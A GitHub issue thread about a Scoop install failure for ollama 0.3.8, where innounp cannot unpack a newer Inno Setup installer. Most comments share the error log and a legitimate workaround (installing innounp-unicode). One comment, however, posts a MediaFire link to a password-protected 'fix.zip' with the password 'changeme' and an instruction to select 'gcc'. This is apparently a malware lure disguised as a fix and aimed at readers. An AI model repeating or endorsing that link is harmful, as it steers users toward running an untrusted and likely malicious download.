### ISSUE TITLE
ollama@0.3.8: decompress error

### ISSUE THREAD

**Issue by nahid6970** [ScoopInstaller/Main#6143]
 scoop install ollama
WARN  Purging previous failed installation of ollama.
ERROR 'ollama' isn't installed correctly.
Removing older version (0.3.8).
'ollama' was uninstalled.
Installing 'ollama' (0.3.8) [64bit] from 'main' bucket
Loading OllamaSetup.exe from cache
Checking hash of OllamaSetup.exe ... ok.
Extracting OllamaSetup.exe ... ERROR Exit code was 1!
Failed to extract files from C:\Users\nahid\scoop\apps\ollama\0.3.8\OllamaSetup.exe.
Log file:
  ~\scoop\apps\ollama\0.3.8\innounp.log

Please try again or create a new issue by using the following link and paste your console output:
https://github.com/ScoopInstaller/Main/issues/new?title=ollama%400.3.8%3a+decompress+error

here is the innounp.log
Signature detected: Inno Setup Setup Data (6.3.0)
This is not directly supported, but i'll try to unpack it as version 5602
; Version detected: 6300
Unpacking failed. This version is not supported.

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lapo-luchini** [comment]
Identical error on `ollama@0.3.9`.

**Comment by lapo-luchini** [comment]
I worked around this as suggested in https://github.com/ScoopInstaller/Scoop/issues/6040:
```
scoop bucket add versions
scoop install versions/innounp-unicode
scoop install ollama
```

**Comment by misaligar** [comment]
> I worked around this as suggested in [ScoopInstaller/Scoop#6040](https://github.com/ScoopInstaller/Scoop/issues/6040):
> 
> ```
> scoop bucket add versions
> scoop install versions/innounp-unicode
> scoop install ollama
> ```

I am getting the following

```
Installing 'innounp-unicode' (1.72) [64bit] from 'versions' bucket
No connection could be made because the target machine actively refused it. [::ffff:212.90.148.127]:443 (www.rathlev-home.de:443)
URL https://www.rathlev-home.de/tools/download/innounp-1.zip is not valid
```

**Comment by misaligar** [comment]
> > I worked around this as suggested in [ScoopInstaller/Scoop#6040](https://github.com/ScoopInstaller/Scoop/issues/6040):
> > ```
> > scoop bucket add versions
> > scoop install versions/innounp-unicode
> > scoop install ollama
> > ```
> 
> I am getting the following
> 
> ```
> Installing 'innounp-unicode' (1.72) [64bit] from 'versions' bucket
> No connection could be made because the target machine actively refused it. [::ffff:212.90.148.127]:443 (www.rathlev-home.de:443)
> URL https://www.rathlev-home.de/tools/download/innounp-1.zip is not valid
> ```

Never mind. It works now. Must have been a temporary network issue on my end.

**Comment by TonyApuzzo** [comment]
still a problem with ollama 0.3.11 -- workaround from https://github.com/ScoopInstaller/Extras/issues/13444#issuecomment-2213509434 still works
